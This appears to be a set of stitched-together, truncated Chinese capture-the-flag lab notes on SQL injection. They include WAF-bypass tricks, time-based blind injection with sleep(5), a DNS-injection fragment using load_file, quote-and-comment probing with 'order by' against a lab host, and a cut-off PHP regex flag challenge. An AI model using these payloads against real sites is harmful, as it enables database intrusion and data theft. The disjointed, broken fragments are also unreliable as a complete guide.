1先来?id=1可以存在注入 ?id=1 and 1=1 有安全狗 安全是建立在信任的基础上的，防火墙默认对图片和文件的传参都是安全的。所有运用/1.txt尝试延时盲注：/1.txt?id=1 and sleep(5) 成功用工具跑，访问频率太高，防火墙可能把你ban掉。2使用DNS注入 这里是调用了一个可以读取文件的函数load_file;load_file(concat(&

<?php   $key='flag{********************************}';  $Regular= preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i", trim($_GET["id"]), $ma

1栏中输入？id=1开题，浏览器有反应说明可以SQL注入 http://o1.lab.aqlab.cn:81/?id=1猜字段数 单引号先闭合 后面会干扰--注释掉 没报错 说明有单引号 后面的单引号注释掉了   （''）2 http://o1.lab.aqlab.cn:81/?id=1%27order%20by%201--order by 1没有报错